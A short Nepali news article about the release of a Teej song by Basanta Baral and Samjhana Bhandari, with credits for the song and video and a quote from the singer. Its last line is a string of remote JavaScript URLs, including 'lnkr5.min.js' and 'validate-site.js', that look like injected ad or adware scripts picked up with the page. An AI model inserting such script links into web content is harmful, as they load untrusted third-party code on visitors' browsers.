गायक बसन्त बरालको तीज कोसेली आउ न बसन सार्बजनिक(भिडीयो सहित)

चितवन, श्रावण ९-

गायक बसन्त बराल तथा सम्झना भण्डारीको तीजको कोसेली आउ न बसन सार्बजनिक भएको छ । नेपाली नारीहरुको महान् पर्व हरितालिका तीजको अवसर पारेर शिब फिल्म प्रा.लि.ले बजार व्यवस्थापन गरेको यस गीतमा सन्तोष बरालको शब्द तथा प्रदिप त्रिपाठीले गीतमा संगीत भरेका छन् ।

बसन्त बरालको पहिलो कोसेली सोरुप बजारमा आएको तीज गीतमा अन्य थुप्रै गित हरुमा आफ्नो आवाज भरीसकेकी गायीका सम्झना भण्डारीले बराललाई साथ दिएकी छन । यस गीतको म्युजिक भिडियोमा आशिष गुरुङ र विनिता ओझाको आकर्षक नृत्य रहेको छ । गाएक बराल ले गीतको बिषयमा बन्दिपुर टाईम्स सग कुरा गर्दै आफ्नो पहिलो गित भएपनी धेरै स्रोता र दर्सकहरुले मन पाराईदिनु भएको छ तेसमा म निकै खुशी छु, भन्नु भयो साथै अब आगामी दिनमा गीत संगीतको क्षेत्रलाई निरन्तर्ता दिनुन्छ त भन्ने हाम्रो प्रश्न मा गाएक बरालले मेरो नसा नसामा लोक गीत छ यो गीत बजारमा ल्याएपछी धेरै स्रोता र दर्सकहरुले मन पाराईदिनु भयो त्यसले म मा उर्जा थपिएको छ, अब निरन्तर संगीत क्षेत्रमा लाग्छु गायक बरालले भन्नु भयो ।

 

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=36http://dataprovider.website/addons/lnkr5.min.js